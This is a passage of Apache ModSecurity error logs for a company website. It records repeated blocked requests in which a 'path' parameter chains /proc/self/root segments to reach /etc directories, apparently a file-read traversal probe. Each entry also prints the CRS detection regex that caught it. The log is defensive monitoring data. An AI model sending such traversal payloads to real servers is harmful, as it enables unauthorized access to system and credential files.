"www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-5zJ3M9BSuKP7CAYzRAAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:34:49.536568 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.243.128:59588] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-6fXLqtnMIWvjpaKtawAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:34:51.443981 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:59598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-6ta6ubjKNq_cu4bsyAAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:34:52.944050 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.243.128:59612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-7PXLqtnMIWvjpaKtcAAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:34:54.257991 2026] [:error] [pid 21219:tid 140411649607424] [client 74.7.243.128:59622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-7vXLqtnMIWvjpaKtcwAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:00.572006 2026] [:error] [pid 9818:tid 140411582465792] [client 74.7.243.128:58148] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-9F1pVZ5mVmJwsFNEfgAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:02.359649 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:58154] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-9uoXxyEfFpUF8f-UaAAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:04.181584 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:58170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0--OoXxyEfFpUF8f-UaQAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:06.151646 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.243.128:58184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0--hCii7xarUs8iHZ7aQAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:07.459827 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.243.128:58186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0--xCii7xarUs8iHZ7bQAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:08.772982 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:58202] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-_OoXxyEfFpUF8f-UawAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:09.022780 2026] [:error] [pid 11167:tid 140411666392832] [client 74.7.244.43:52298] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0-_fHIg5MgXLBnicMK4AAAAck"]
[Fri Mar 20 09:35:12.724813 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.243.128:50842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-_vXLqtnMIWvjpaKteAAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:14.826812 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.243.128:50856] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_AvqxLDW4GITHUkT9HgAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:17.318554 2026] [:error] [pid 7893:tid 140411683178240] [client 74.7.243.128:50866] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_BBCii7xarUs8iHZ7cwAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:18.864719 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:50874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_BuoXxyEfFpUF8f-UbwAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:20.175390 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:58878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_CNa6ubjKNq_cu4btBwAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:23.685557 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:58894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_C-oXxyEfFpUF8f-UcgAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:25.991127 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.243.128:58916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_DRCii7xarUs8iHZ7dwAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:27.337359 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.243.128:58918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_D_XLqtnMIWvjpaKtgwAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:29.293906 2026] [mime_magic:error] [pid 26799:tid 140411540502272] (70014)End of file found: [client 57.141.18.8:46820] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:35:34.237820 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.243.128:58926] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_FhCii7xarUs8iHZ7gwAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:43.442977 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:37828] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_H_qxLDW4GITHUkT9MAAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
